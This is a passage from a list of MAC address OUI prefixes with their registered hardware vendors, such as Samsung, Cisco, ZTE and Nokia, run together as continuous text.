SHENQI Technology Co., Ltd. A0A65C Supercomputing Systems AG 485073 Microsoft Corporation E8377A Zyxel Communications Corporation 803B2A ABB Xiamen Low Voltage Equipment Co.,Ltd. C4EA1D Technicolor 7CF90E Samsung Electronics Co.,Ltd 50F0D3 Samsung Electronics Co.,Ltd 00A784 ITX security 84119E Samsung Electronics Co.,Ltd 149A10 Microsoft Corporation 38FACA Skyworth Digital Technology(Shenzhen) Co.,Ltd 5CB43E HUAWEI TECHNOLOGIES CO.,LTD 707781 Hon Hai Precision Ind. Co.,Ltd. 54E140 INGENICO E4907E Motorola Mobility LLC, a Lenovo Company 746A3A Aperi Corporation 94A7B7 zte corporation 1844E6 zte corporation 3CCE15 Mercedes-Benz USA, LLC 287610 IgniteNet 20D75A Posh Mobile Limited F41563 F5 Networks, Inc. 8C8B83 Texas Instruments 4011DC Sonance 1C8341 Hefei Bitland Information Technology Co.Ltd 081FEB BinCube 785F4C Argox Information Co., Ltd. 34CC28 Nexpring Co. LTD., 54E2C8 Dongguan Aoyuan Electronics Technology Co., Ltd 6C1E70 Guangzhou YBDS IT Co.,Ltd 54B80A D-Link International D8ADDD Sonavation, Inc. 8833BE Ivenix, Inc. E48D8C Routerboard.com 706879 Saijo Denki International Co., Ltd. 10AF78 Shenzhen ATUE Technology Co., Ltd CC19A8 PT Inovação e Sistemas SA B4B265 DAEHO I&T E03560 Challenger Supply Holdings, LLC 3CCB7C TCT mobile ltd 249EAB HUAWEI TECHNOLOGIES CO.,LTD 244B03 Samsung Electronics Co.,Ltd E4CE70 Health & Life co., Ltd. 7C11CD QianTang Technology CCA4AF Shenzhen Sowell Technology Co., LTD 102C83 XIMEA 6CA75F zte corporation 8C7967 zte corporation 7858F3 Vachen Co.,Ltd 709C8F Nero AG 007E56 China Dragon Technology Limited 74E28C Microsoft Corporation 0071C2 PEGATRON CORPORATION 7C8274 Shenzhen Hikeen Technology CO.,LTD 94D417 GPI KOREA INC. 244B81 Samsung Electronics Co.,Ltd 704E66 SHENZHEN FAST TECHNOLOGIES CO.,LTD D855A3 zte corporation 38D82F zte corporation F07959 ASUSTek COMPUTER INC. E08E3C Aztech Electronics Pte Ltd 844BB7 Beijing Sankuai Online Technology Co.,Ltd 68F0BC Shenzhen LiWiFi Technology Co., Ltd 300EE3 Aquantia Corporation 18F145 NetComm Wireless Limited ACABBF AthenTek Inc. 2884FA SHARP Corporation 60AF6D Samsung Electronics Co.,Ltd B85A73 Samsung Electronics Co.,Ltd 3C1E04 D-Link International 60D9A0 Lenovo Mobile Communication Technology Ltd. 68B983 b-plus GmbH 78B3B9 ShangHai sunup lighting CO.,LTD 04C09C Tellabs Inc. 981DFA Samsung Electronics Co.,Ltd 186882 Beward R&D Co., Ltd. EC8009 NovaSparks 50ADD5 Dynalec Corporation B04519 TCT mobile ltd D88D5C Elentec 7429AF Hon Hai Precision Ind. Co.,Ltd. 3C1A0F ClearSky Data E8CC18 D-Link International B09137 ISis ImageStream Internet Solutions, Inc 8C0551 Koubachi AG D897BA PEGATRON CORPORATION A8D88A Wyconn 40EACE FOUNDER BROADBAND NETWORK SERVICE CO.,LTD 848EDF Sony Mobile Communications Inc A49D49 Ketra, Inc. C03896 Hon Hai Precision Ind. Co.,Ltd. 2C5089 Shenzhen Kaixuan Visual Technology Co.,Limited 948E89 INDUSTRIAS UNIDAS SA DE CV 00AEFA Murata Manufacturing Co., Ltd. 841826 Osram GmbH F8E903 D-Link International E89606 testo Instruments (Shenzhen) Co., Ltd. 1C7E51 3bumen.com 6872DC CETORY.TV Company Limited 3077CB Maike Industry(Shenzhen)CO.,LTD 2497ED Techvision Intelligent Technology Limited 909F33 EFM Networks 600417 POSBANK CO.,LTD 207693 Lenovo (Beijing) Limited. 084656 VEO-LABS EC3C5A SHEN ZHEN HENG SHENG HUI DIGITAL TECHNOLOGY CO.,LTD 4488CB Camco Technologies NV 6CBFB5 Noon Technology Co., Ltd 50294D NANJING IOT SENSOR TECHNOLOGY CO,LTD 0CCFD1 SPRINGWAVE Co., Ltd 74BADB Longconn Electornics(shenzhen)Co.,Ltd B8F317 iSun Smasher Communications Private Limited 8CF813 ORANGE POLSKA 549F35 Dell Inc. 2442BC Alinco,incorporated F82441 Yeelink 108A1B RAONIX Inc. 102F6B Microsoft Corporation 8CB094 Airtech I&C Co., Ltd 945493 Rigado, LLC 68F06D ALONG INDUSTRIAL CO., LIMITED F42853 Zioncom Electronics (Shenzhen) Ltd. D4EC86 LinkedHope Intelligent Technologies Co., Ltd 1C9C26 Zoovel Technologies 046785 scemtec Hard- und Software fuer Mess- und Steuerungstechnik GmbH D0FA1D Qihoo360Technology Co.,Ltd AC11D3 Suzhou HOTEKVideo Technology Co. Ltd 8432EA ANHUI WANZTEN P&T CO., LTD E01D38 Beijing HuaqinWorld Technology Co.,Ltd E47FB2 FUJITSU LIMITED FC6DC0 BME CORPORATION 24D13F MEXUS CO.,LTD 7824AF ASUSTek COMPUTER INC. FC9FE1 CONWIN.Tech. Ltd B89BE4 ABB Power Systems Power Generation A81B5D Foxtel Management Pty Ltd 505065 TAKT Corporation 40C62A Shanghai Jing Ren Electronic Technology Co., Ltd. E8150E Nokia Corporation C44202 Samsung Electronics Co.,Ltd B4AE6F Circle Reliance, Inc DBA Cranberry Networks 90DA6A FOCUS H&S Co., Ltd. DC537C Compal Broadband Networks, Inc. 44A6E5 THINKING TECHNOLOGY CO.,LTD A45DA1 ADB Broadband Italia 0CAC05 Unitend Technologies Inc. 4C6E6E Comnect Technology CO.,LTD 8C3357 HiteVision Digital Media Technology Co.,Ltd. 3CAA3F iKey, Ltd. 0C383E Fanvil Technology Co., Ltd. 60CDA9 Abloomy B8AD3E BLUECOM 183009 Woojin Industrial Systems Co., Ltd. 74DBD1 Ebay Inc 30B5F1 Aitexin Technology Co., Ltd B01041 Hon Hai Precision Ind. Co.,Ltd. 80AD67 Kasda Networks Inc 18D5B6 SMG Holdings LLC 5C2E59 Samsung Electronics Co.,Ltd A8E539 Moimstone Co.,Ltd 54B753 Hunan Fenghui Yinjia Science And Technology Co.,Ltd 103047 Samsung Electronics Co.,Ltd F884F2 Samsung Electronics Co.,Ltd B0754D Nokia E0CBEE Samsung Electronics Co.,Ltd 4C3909 HPL Electric & Power Private Limited 907EBA UTEK TECHNOLOGY (SHENZHEN) CO.,LTD A002DC Amazon Technologies Inc. 542AA2 Alpha Networks Inc. 84948C Hitron Technologies. Inc A8F7E0 PLANET Technology Corporation 4486C1 Siemens Low Voltage & Products 4045DA Spreadtrum Communications (Shanghai) Co., Ltd. 3451AA JID GLOBAL 98BE94 IBM 6C198F D-Link International C8FF77 Dyson Limited B49EAC Imagik Int'l Corp CC07E4 Lenovo Mobile Communication Technology Ltd. C46BB4 myIDkey 0C63FC Nanjing Signway Technology Co., Ltd D4E08E ValueHD Corporation C89F1D SHENZHEN COMMUNICATION TECHNOLOGIES CO.,LTD 143DF2 Beijing Shidai Hongyuan Network Communication Co.,Ltd 2C39C1 Ciena Corporation 54EE75 Wistron InfoComm(Kunshan)Co.,Ltd. 0874F6 Winterhalter Gastronom GmbH D8492F CANON INC. 800E24 ForgetBox 3C25D7 Nokia Corporation 30A8DB Sony Mobile Communications Inc 18FF2E Shenzhen Rui Ying Da Technology Co., Ltd 847207 I&C Technology CCA614 AIFA TECHNOLOGY CORP. 90F1B0 Hangzhou Anheng Info&Tech CO.,LTD 4C8B30 Actiontec Electronics, Inc 0805CD DongGuang EnMai Electronic Product Co.Ltd. 54D163 MAX-TECH,INC 48B5A7 Glory Horse Industries Ltd. 0C4F5A ASA-RT s.r.l. D4224E Alcatel Lucent 9C86DA Phoenix Geophysics Ltd. 2C073C DEVLINE LIMITED 7C1A03 8Locations Co., Ltd. ACB859 Uniband Electronic Corp, 2C9AA4 Eolo SpA 88B1E1Mojo Networks, Inc. 90DB46 E-LEAD ELECTRONIC CO., LTD 344F5C R&M AG 6047D4 FORICS Electronic Technology Co., Ltd. FCF8B7 TRONTEQ Electronic 30F42F ESP 704E01 KWANGWON TECH CO., LTD. 746A8F VS Vision Systems GmbH 54A31B Shenzhen Linkworld Technology Co,.LTD CC398C Shiningtek 1820A6 Sage Co., Ltd. 20EAC7 SHENZHEN RIOPINE ELECTRONICS CO., LTD 64B370 PowerComm Solutions LLC 5CF50D Institute of microelectronic applications 749C52 Huizhou Desay SV Automotive Co., Ltd. C4291D KLEMSAN ELEKTRIK ELEKTRONIK SAN.VE TIC.AS. 6C5F1C Lenovo Mobile Communication Technology Ltd. 7CE4AA Private 083F3E WSH GmbH 2C957F zte corporation 3C0C48 Servergy, Inc. 10DEE4 automationNEXT GmbH F03A4B Bloombase, Inc. A0E453 Sony Mobile Communications Inc 404A18 Addrek Smart Solutions C0C569 SHANGHAI LYNUC CNC TECHNOLOGY CO.,LTD C4C0AE MIDORI ELECTRONIC CO., LTD. ACC595 Graphite Systems 7CE1FF Computer Performance, Inc. DBA Digital Loggers, Inc. D8150D TP-LINK TECHNOLOGIES CO.,LTD. 5850AB TLS Corporation 7CCD11 MS-Magnet 98FF6A OTEC(Shanghai)Technology Co.,Ltd. BC1A67 YF Technology Co., Ltd 4CD7B6 Helmer Scientific 8425A4 Tariox Limited 483D32 Syscor Controls & Automation CC856C SHENZHEN MDK DIGITAL TECHNOLOGY CO.,LTD AC6BAC Jenny Science AG D8EE78 Moog Protokraft 241148 Entropix, LLC C445EC Shanghai Yali Electron Co.,LTD E0E631 SNB TECHNOLOGIES LIMITED 78B5D2 Ever Treasure Industrial Limited 50ED78 Changzhou Yongse Infotech Co.,Ltd 90028A Shenzhen Shidean Legrand Electronic Products Co.,Ltd 1CC11A Wavetronix FC09D8 ACTEON Group 743ECB Gentrice tech 7C444C Entertainment Solutions, S.L. 0444A1 TELECON GALICIA,S.A. 20C60D Shanghai annijie Information technology Co.,LTD 38CA97 Contour Design LLC BC2D98 ThinGlobal LLC 1879A2 GMJ ELECTRIC LIMITED E0C86A SHENZHEN TW-SCIE Co., Ltd BCEE7B ASUSTek COMPUTER INC. 3413A8 Mediplan Limited 7C9763 Openmatics s.r.o. 48A2B7 Kodofon JSC CC7498 Filmetrics Inc. 085AE0 Recovision Technology Co., Ltd. 20E791 Siemens Healthcare Diagnostics, Inc 089758 Shenzhen Strong Rising Electronics Co.,Ltd DongGuan Subsidiary FC19D0 Cloud Vision Networks Technology Co.,Ltd. 9486D4 Surveillance Pro Corporation 9CD643 D-Link International 3C18A0 Luxshare Precision Industry Company Limited 8CAE89 Y-cam Solutions Ltd 94E98C Nokia FCE1D9 Stable Imaging Solutions LLC 50206B Emerson Climate Technologies Transportation Solutions 7CBF88 Mobilicom LTD 60DB2A HNS B04545 YACOUB Automation GmbH C8EE75 Pishion International Co. Ltd CC3429 TP-LINK TECHNOLOGIES CO.,LTD. 64BABD SDJ Technologies, Inc. 24C848 mywerk Portal GmbH CCFB65 Nintendo Co., Ltd. A0A23C GPMS 68FCB3 Next Level Security Systems, Inc. 94C3E4 Atlas Copco IAS GmbH 34885D Logitech Far East 88576D XTA Electronics Ltd BC4100 CODACO ELECTRONIC s.r.o. FCD817 Beijing Hesun Technologies Co.Ltd. 682DDC Wuhan Changjiang Electro-Communication Equipment CO.,LTD E8611F Dawning Information Industry Co.,Ltd 2847AA Nokia Corporation 5CD61F Qardio, Inc 705957 Medallion Instrumentation Systems 9C443D CHENGDU XUGUANG TECHNOLOGY CO, LTD B424E7 Codetek Technology Co.,Ltd 542F89 Euclid Laboratories, Inc. 909916 ELVEES NeoTek OJSC 00A2FF abatec group AG 6024C1 Jiangsu Zhongxun Electronic Technology Co., Ltd A0143D PARROT SA FC1BFF V-ZUG AG F42896 SPECTO PAINEIS ELETRONICOS LTDA 78CB33 DHC Software Co.,Ltd 60A9B0 Merchandising Technologies, Inc 5027C7 TECHNART Co.,Ltd 6C5AB5 TCL Technoly Electronics (Huizhou) Co., Ltd. 385AA8 Beijing Zhongdun Security Technology Development Co. F4A294 EAGLE WORLD DEVELOPMENT CO., LIMITED EC3E09 PERFORMANCE DESIGNED PRODUCTS, LLC 947C3E Polewall Norge AS 34A3BF Terewave. Inc. 8C088B Remote Solution B43E3B Viableware, Inc 0C5CD8 DOLI Elektronik GmbH 3C15EA TESCOM CO., LTD. E80410 Private F4BD7C Chengdu jinshi communication Co., LTD DCC422 Systembase Limited C8F36B Yamato Scale Co.,Ltd. 98F8C1 IDT Technology Limited 6CD1B0 WING SING ELECTRONICS HONG KONG LIMITED A4F522 CHOFU SEISAKUSHO CO.,LTD 845C93 Chabrier Services 68E166 Private BC2BD7 Revogi Innovation Co., Ltd. 286D97 SAMJIN Co., Ltd. 24ECD6 CSG Science & Technology Co.,Ltd.Hefei CC2A80 Micro-Biz intelligence solutions Co.,Ltd 60FEF9 Thomas & Betts B8DC87 IAI Corporation 7C6FF8 ShenZhen ACTO Digital Video Technology Co.,Ltd. DCF755 SITRONIK 5C026A Applied Vision Corporation 0C9301 PT. Prasimax Inovasi Teknologi 746630 T:mi Ytti 6CB350 Anhui comhigher tech co.,ltd 3859F8 MindMade Sp. z o.o. 4CDF3D TEAM ENGINEERS ADVANCE TECHNOLOGIES INDIA PVT LTD E89218 Arcontia International AB 0075E1 Ampt, LLC 98CDB4 Virident Systems, Inc. A42305 Open Networking Laboratory 1C48F9 GN Netcom A/S B0FEBD Private 60699B isepos GmbH D4D50D Southwest Microwave, Inc 34CD6D CommSky Technologies E4F3E3 Shanghai iComhome Co.,Ltd. 9046B7 Vadaro Pte Ltd 04CF25 MANYCOLORS, INC. 80BBEB Satmap Systems Ltd 00B78D Nanjing Shining Electric Automation Co., Ltd 60FE1E China Palms Telecom.Ltd B050BC SHENZHEN BASICOM ELECTRONIC CO.,LTD. 841E26 KERNEL-I Co.,LTD B4346C MATSUNICHI DIGITAL TECHNOLOGY (HONG KONG) LIMITED 0086A0 Private A05B21 ENVINET GmbH 50B8A2 ImTech Technologies LLC, B04C05 Fresenius Medical Care Deutschland GmbH B0793C Revolv Inc 9C4EBF BoxCast 34A843 KYOCERA Display Corporation 74CA25 Calxeda, Inc. 5CA3EB Lokel s.r.o. C8B373 Cisco-Linksys, LLC 0C2AE7 Beijing General Research Institute of Mining and Metallurgy 983071 DAIKYUNG VASCOM D49524 Clover Network, Inc. 945047 Rechnerbetriebsgruppe E031D0 SZ Telstar CO., LTD 54112F Sulzer Pump Solutions Finland Oy 4C55B8 Turkcell Teknoloji 088039 Cisco SPVTG E438F2 Advantage Controls C4C755 Beijing HuaqinWorld Technology Co.,Ltd 0C2D89 QiiQ Communications Inc. A8D236 Lightware Visual Engineering 981094 Shenzhen Vsun communication technology Co.,ltd A4F3C1 Open Source Robotics Foundation, Inc. 141330 Anakreon UK LLP 0CF405 Beijing Signalway Technologies Co.,Ltd 5061D6 Indu-Sol GmbH DC7014 Private 788DF7 Hitron Technologies. Inc 2C245F Babolat VS 905692 Autotalks Ltd. 04BFA8 ISB Corporation 8CC7D0 zhejiang ebang communication co.,ltd B8AE6E Nintendo Co., Ltd. D0EB03 Zhehua technology limited 683EEC ERECA C42628 Airo Wireless 30AABD Shanghai Reallytek Information Technology Co.,Ltd A4B818 PENTA Gesellschaft für elektronische Industriedatenverarbeitung mbH C04DF7 SERELEC 0C8484 Zenovia Electronics Inc. 005907 LenovoEMC Products USA, LLC 50A715 Aboundi, Inc. 0C0400 Jantar d.o.o. 687CD5 Y Soft Corporation, a.s. 907AF1 Wally 2CB693 Radware A861AA Cloudview Limited FC1186 Logic3 plc E01877 FUJITSU LIMITED E457A8 Stuart Manufacturing, Inc. 789966 Musilab Electronics (DongGuan)Co.,Ltd. 28CBEB One 7CA15D GN ReSound A/S 3C081E Beijing Yupont Electric Power Technology Co.,Ltd FC58FA Shen Zhen Shi Xin Zhong Xin Technology Co.,Ltd. 4CCC34 Motorola Solutions Inc. D0D471 MVTECH co., Ltd 0868D0 Japan System Design D4223F Lenovo Mobile Communication Technology Ltd. C8EEA6 Shenzhen SHX Technology Co., Ltd 2481AA KSH International Co., Ltd. AC4122 Eclipse Electronic Systems Inc. 6897E8 Society of Motion Picture & Television Engineers E8E875 iS5 Communications Inc. C80E95 OmniLync Inc. 30055C Brother industries, LTD. 080EA8 Velex s.r.l. B8C46F PRIMMCON INDUSTRIES INC D8B02E Guangzhou Zonerich Business Machine Co., LTD. C4E032 IEEE 1904.1 Working Group 58EB14 Proteus Digital Health C458C2 Shenzhen TATFOOK Technology Co., Ltd. D0CDE1 Scientech Electronics 5CE0CA FeiTian United (Beijing) System Technology Co., Ltd. E08177 GreenBytes, Inc. 9C9811 Guangzhou Sunrise Electronics Development Co., Ltd B86091 Onnet Technologies and Innovations LLC 8C76C1 Goden Tech Limited 8C078C FLOW DATA INC F8DFA8 zte corporation A895B0 Aker Subsea Ltd 104D77 Innovative Computer Engineering C45DD8 HDMI Forum C4EBE3 RRCN SAS 94756E QinetiQ North America 4C1A95 Novakon Co., Ltd. 60BB0C Beijing HuaqinWorld Technology Co,Ltd A42C08 Masterwork Automodules 10B9FE Lika srl 301518 Ubiquitous Communication Co. ltd. 841715 GP Electronics (HK) Ltd. 848E96 Embertec Pty Ltd 6499A0 AG Elektronik AB 08F1B7 Towerstream Corpration C044E3 Shenzhen Sinkna Electronics Co., LTD 18550F Cisco SPVTG 187A93 AMICCOM Electronics Corporation 8887DD DarbeeVision Inc. 30C82A WI-BIZ srl 88A3CC Amatis Controls C0A0C7 FAIRFIELD INDUSTRIES DCA989 MACANDC A00363 Robert Bosch Healthcare GmbH D0B498 Robert Bosch LLC Automotive Electronics E05597 Emergent Vision Technologies Inc. 7C438F E-Band Communications Corp. A0E25A Amicus SK, s.r.o. D40FB2 Applied Micro Electronics AME bv 449B78 The Now Factory F0F669 Motion Analysis Corporation 78995C Nationz Technologies Inc 849DC5 Centera Photonics Inc. 580943 Private ECFC55 A. Eberle GmbH & Co. KG 182A7B Nintendo Co., Ltd. 68FB95 Generalplus Technology Inc. F8F082 NAG LLC 5C89D4 Beijing Banner Electric Co.,Ltd 54115F Atamo Pty Ltd 8CAE4C Plugable Technologies 0CC655 Wuxi YSTen Technology Co.,Ltd. 242FFA Toshiba Global Commerce Solutions E496AE ALTOGRAPHICS Inc. 4C2258 cozybit, Inc. F49466 CountMax,ltd F45214 Mellanox Technologies, Inc. 1C959F Veethree Electronics And Marine LLC 0881F4 Juniper Networks 10F49A T3 Innovation 3C57BD Kessler Crane Inc. 04E9E5 PJRC.COM, LLC 60BD91 Move Innovation CC4BFB Hellberg Safety AB 6CADEF KZ Broadband Technologies, Ltd. 745FAE TSL PPL 6851B7 PowerCloud Systems, Inc. 742D0A Norfolk Elektronik AG 70F1E5 Xetawave LLC C0AA68 OSASI Technos Inc. 88D7BC DEP Company 485A3F WISOL 60BC4C EWM Hightec Welding GmbH 1C11E1 Wartsila Finland Oy 50465D ASUSTek COMPUTER INC. 74BFA1 HYUNTECK CC262D Verifi, LLC 3C8AE5 Tensun Information Technology(Hangzhou) Co.,LTD 2C5AA3 PROMATE ELECTRONIC CO.LTD 34E0CF zte corporation 08B738 Lite-On Technogy Corp. F8AA8A Axview Technology (Shenzhen) Co.,Ltd 7C0187 Curtis Instruments, Inc. 54F666 Berthold Technologies GmbH and Co.KG 34C803 Nokia Corporation F05F5A Getriebebau NORD GmbH and Co. KG 801DAA Avaya Inc 7C092B Bekey A/S 842BBC Modelleisenbahn GmbH B4009C CableWorld Ltd. 289EDF Danfoss Turbocor Compressors, Inc 803FD6 bytes at work AG 784405 FUJITU(HONG KONG) ELECTRONIC Co.,LTD. 044A50 Ramaxel Technology (Shenzhen) limited company 0CD9C1 Visteon Corporation 38A5B6 SHENZHEN MEGMEET ELECTRICAL CO.,LTD 68AB8A RF IDeas 24EE3A Chengdu Yingji Electronic Hi-tech Co Ltd 0CC66A Nokia Corporation 74273C ChangYang Technology (Nanjing) Co., LTD 087CBE Quintic Corp. E804F3 Throughtek Co., Ltd. 0868EA EITO ELECTRONICS CO., LTD. F82285 Cypress Technology CO., LTD. C4AD21 MEDIAEDGE Corporation E85BF0 Imaging Diagnostics A40BED Carry Technology Co.,Ltd 702393 fos4X GmbH 64D814 Cisco Systems, Inc F85F2A Nokia Corporation C438D3 TAGATEC CO.,LTD 502ECE Asahi Electronics Co.,Ltd AC14D2 wi-daq, inc. 9C4CAE Mesa Labs 20C1AF i Wit Digital Co., Limited 80AAA4 USAG 30AEF6 Radio Mobile Access 085B0E Fortinet, Inc. EC42F0 ADL Embedded Solutions, Inc. E8CBA1 Nokia Corporation 6CE4CE Villiger Security Solutions AG 649FF7 Kone OYj CC912B TE Connectivity Touch Solutions C05E79 SHENZHEN HUAXUN ARK TECHNOLOGIES CO.,LTD 58BFEA Cisco Systems, Inc C401B1 SeekTech INC C0C946 MITSUYA LABORATORIES INC. F4600D Panoptic Technology, Inc A82BD6 Shina System Co., Ltd ACCF23 Hi-flying electronics technology Co.,Ltd 609084 DSSD Inc FC1D59 I Smart Cities HK Ltd 78C4AB Shenzhen Runsil Technology Co.,Ltd B0A86E Juniper Networks 802AFA Germaneers GmbH 18421D Private 28C914 Taimag Corporation 7493A4 Zebra Technologies Corp. E47185 Securifi Ltd 080CC9 Mission Technology Group, dba Magma 640E94 Pluribus Networks, Inc. 0CB4EF Digience Co.,Ltd. 146A0B Cypress Electronics Limited F490EA Deciso B.V. 5CEE79 Global Digitech Co LTD 4CAA16 AzureWave Technologies (Shanghai) Inc. AC40EA C&T Solution Inc. 002AAF LARsys-Automation GmbH 1CE165 Marshal Corporation 4016FA EKM Metering 0C130B Uniqoteq Ltd. 2C542D Cisco Systems, Inc BC1401 Hitron Technologies. Inc 94CA0F Honeywell Analytics 782544 Omnima Limited A41875 Cisco Systems, Inc C8AE9C Shanghai TYD Elecronic Technology Co. Ltd AC3FA4 TAIYO YUDEN CO.,LTD 6CAE8B IBM Corporation 40AC8D Data Management, Inc. 80CEB1 Theissen Training Systems GmbH FC2A54 Connected Data, Inc. 045C06 Zmodo Technology Corporation 747B7A ETH Inc. 48EA63 Zhejiang Uniview Technologies Co., Ltd. E88DF5 ZNYX Networks, Inc. 90F72F Phillips Machine & Welding Co., Inc. D05785 Pantech Co., Ltd. 408B07 Actiontec Electronics, Inc 284121 OptiSense Network, LLC 38458C MyCloud Technology corporation 10E4AF APR, LLC F4EA67 Cisco Systems, Inc 2C2D48 bct electronic GesmbH 28BA18 NextNav, LLC AC3D75 HANGZHOU ZHIWAY TECHNOLOGIES CO.,LTD. A090DE VEEDIMS,LLC 642DB7 SEUNGIL ELECTRONICS 002A6A Cisco Systems, Inc F436E1 Abilis Systems SARL 781C5A SHARP Corporation E80C75 Syncbak, Inc. 800A06 COMTEC co.,ltd 608C2B Hanson Technology 940070 Nokia Corporation BC2C55 Bear Flag Design, Inc. 0C7523 BEIJING GEHUA CATV NETWORK CO.,LTD 04F021 Compex Systems Pte Ltd 2818FD Aditya Infotech Ltd. D8B90E Triple Domain Vision Co.,Ltd. 342F6E Anywire corporation CCEED9 VAHLE Automation GmbH 005CB1 Gospell DIGITAL TECHNOLOGY CO., LTD B08E1A URadio Systems Co., Ltd D8E952 KEOPSYS BCA4E1 Nabto 908FCF UNO System Co., Ltd 40E793 Shenzhen Siviton Technology Co.,Ltd 000831 Cisco Systems, Inc 34D09B MobilMAX Technology Inc. F0007F Janz - Contadores de Energia, SA 30B3A2 Shenzhen Heguang Measurement & Control Technology Co.,Ltd 506028 Xirrus Inc. 0091FA Synapse Product Development A05AA4 Grand Products Nevada, Inc. F0EEBB VIPAR GmbH 6CE907 Nokia Corporation E4FA1D PAD Peripheral Advanced Design Inc. 1C5C55 PRIMA Cinema, Inc 34BA9A Asiatelco Technologies Co. 506441 Greenlee 9C1FDD Accupix Inc. 7CDD11 Chongqing MAS SCI&TECH.Co.,Ltd B8FD32 Zhejiang ROICX Microelectronics 70EE50 Netatmo 984A47 CHG Hospital Beds 144978 Digital Control Incorporated 2C10C1 Nintendo Co., Ltd. 8CD17B CG Mobile 502267 PixeLINK 3C6A7D Niigata Power Systems Co., Ltd. 3C7059 MakerBot Industries 502690 FUJITSU LIMITED 24B657 Cisco Systems, Inc C8AF40 marco Systemanalyse und Entwicklung GmbH 40984C Casacom Solutions AG 5C18B5 Talon Communications 64E161 DEP Corp. 8823FE TTTech Computertechnik AG B89AED OceanServer Technology, Inc C87D77 Shenzhen Kingtech Communication Equipment Co.,Ltd 94AE61 Alcatel Lucent 5CCEAD CDYNE Corporation AC54EC IEEE P1823 Standards Working Group 709756 Happyelectronics Co.,Ltd B820E7 Guangzhou Horizontal Information & Network Integration Co. Ltd 00CD90 MAS Elektronik AG 7C6B52 Tigaro Wireless 0064A6 Maquet CardioVascular 988BAD Corintech Ltd. D44B5E TAIYO YUDEN CO., LTD. 640E36 TAZTAG 941D1C TLab West Systems AB E455EA Dedicated Computing B05CE5 Nokia Corporation 3482DE Kiio Inc 4C5FD2 Alcatel-Lucent 28C718 Altierre 7C4C58 Scale Computing, Inc. 1013EE Justec International Technology INC. 8C271D QuantHouse 386077 PEGATRON CORPORATION 708105 Cisco Systems, Inc E0ED1A vastriver Technology Co., Ltd D4F63F IEA S.R.L. 58B0D4 ZuniData Systems Inc. 64557F NSFOCUS Information Technology Co., Ltd. 00082F Cisco Systems, Inc 9CC7D1 SHARP Corporation 149090 KongTop industrial(shen zhen)CO.,LTD 38DE60 Mohlenhoff GmbH 2839E7 Preceno Technology Pte.Ltd. 685E6B PowerRay Co., Ltd. 20C8B3 SHENZHEN BUL-TECH CO.,LTD. F8E7B5 µTech Tecnologia LTDA D4CEB8 Enatel LTD 807A7F ABB Genway Xiamen Electrical Equipment CO., LTD 24DAB6 Sistemas de Gestión Energética S.A. de C.V B07D62 Dipl.-Ing. H. Horstmann GmbH B8F5E7 WayTools, LLC B81999 Nesys 34255D Shenzhen Loadcom Technology Co.,Ltd 4CA74B Alcatel Lucent D03110 Ingenic Semiconductor Co.,Ltd 1CE192 Qisda Corporation 706F81 Private FC0012 Toshiba Samsung Storage Technolgoy Korea Corporation 181420 TEB SAS AC81F3 Nokia Corporation 30688C Reach Technology Inc. 10EED9 Canoga Perkins Corporation 94DE0E SmartOptics AS C029F3 XySystem AC4AFE Hisense Broadband Multimedia Technology Co.,Ltd. 54F5B6 ORIENTAL PACIFIC INTERNATIONAL LIMITED 90342B Gatekeeper Systems, Inc. 8CB82C IPitomy Communications 807DE3 Chongqing Sichuan Instrument Microcircuit Co.LTD. DC175A Hitachi High-Technologies Corporation C8A1BA Neul Ltd C43A9F Siconix Inc. 686E23 Wi3 Inc. DCF05D Letta Teknoloji 5C16C7 Big Switch Networks 848F69 Dell Inc. 3C096D Powerhouse Dynamics 900D66 Digimore Electronics Co., Ltd 0C924E Rice Lake Weighing Systems F49461 NexGen Storage B8CDA7 Maxeler Technologies Ltd. 5435DF Symeo GmbH F43D80 FAG Industrial Services GmbH F0DB30 Yottabyte 9C31B6 Kulite Semiconductor Products Inc A4B36A JSC SDO Chromatec E4DD79 En-Vision America, Inc. E8CC32 MicronetLTD D43AE9 DONGGUAN ipt INDUSTRIAL CO., LTD 589835 Technicolor 8C5CA1 d-broad,INC 18F650 Multimedia Pacific Limited 688470 eSSys Co.,Ltd 48DCFB Nokia Corporation 20B7C0 OMICRON electronics GmbH 8058C5 NovaTec Kommunikationstechnik GmbH B8C716 Fiberhome Telecommunication Technologies Co.,LTD D42C3D Sky Light Digital Limited A45A1C smart-electronic GmbH 806459 Nimbus Inc. 8C89A5 Micro-Star INT'L CO., LTD B4A5A9 MODI GmbH E8C320 Austco Communication Systems Pty Ltd C436DA Rusteletech Ltd. 0432F4 Partron 1C184A ShenZhen RicherLink Technologies Co.,LTD 0C3956 Observator instruments DCA6BD Beijing Lanbo Technology Co., Ltd. 10C586 BIO SOUND LAB CO., LTD. 10768A EoCell F44EFD Actions Semiconductor Co.,Ltd.(Cayman Islands) 24B8D2 Opzoon Technology Co.,Ltd. A49981 FuJian Elite Power Tech CO.,LTD. B83A7B Worldplay (Canada) Inc. 1407E0 Abrantix AG DCCF94 Beijing Rongcheng Hutong Technology Co., Ltd. A4DB2E Kingspan Environmental Ltd C8FE30 Bejing DAYO Mobile Communication Technology Ltd. E4D71D Oraya Therapeutics 24C9DE Genoray 54055F Alcatel Lucent 6C5D63 ShenZhen Rapoo Technology Co., Ltd. 941673 Point Core SARL 5C56ED 3pleplay Electronics Private Limited 78028F Adaptive Spectrum and Signal Alignment (ASSIA), Inc. DC16A2 Medtronic Diabetes 308CFB Dropcam D0EB9E Seowoo Inc. BCCD45 VOISMART 143E60 Nokia 7032D5 Athena Wireless Communications Inc 78510C LiveU Ltd. 44AAE8 Nanotec Electronic GmbH & Co. KG D428B2 ioBridge, Inc. 8427CE Corporation of the Presiding Bishop of The Church of Jesus Christ of Latter-day Saints 48D8FE ClarIDy Solutions, Inc. D4945A COSMO CO., LTD 304C7E Panasonic Electric Works Automation Controls Techno Co.,Ltd. 5CF207 Speco Technologies B42A39 ORBIT MERRET, spol. s r. o. 70E843 Beijing C&W Optical Communication Technology Co.,Ltd. 2C7ECF Onzo Ltd 103711 Simlink AS 50E549 GIGA-BYTE TECHNOLOGY CO.,LTD. B4B88D Thuh Company 4C73A5 KOVE 70A41C Advanced Wireless Dynamics S.L. BCBBC9 Kellendonk Elektronik GmbH E42AD3 Magneti Marelli S.p.A. Powertrain E83EB6 RIM BC35E5 Hydro Systems Company 9C5D95 VTC Electronics Corp. B8A8AF Logic S.p.A. 60F673 TERUMO CORPORATION 28CCFF Corporacion Empresarial Altra SL 94FD1D WhereWhen Corp 4C07C9 COMPUTER OFFICE Co.,Ltd. F8769B Neopis Co., Ltd. 74B00C Network Video Technologies, Inc E84040 Cisco Systems, Inc D89DB9 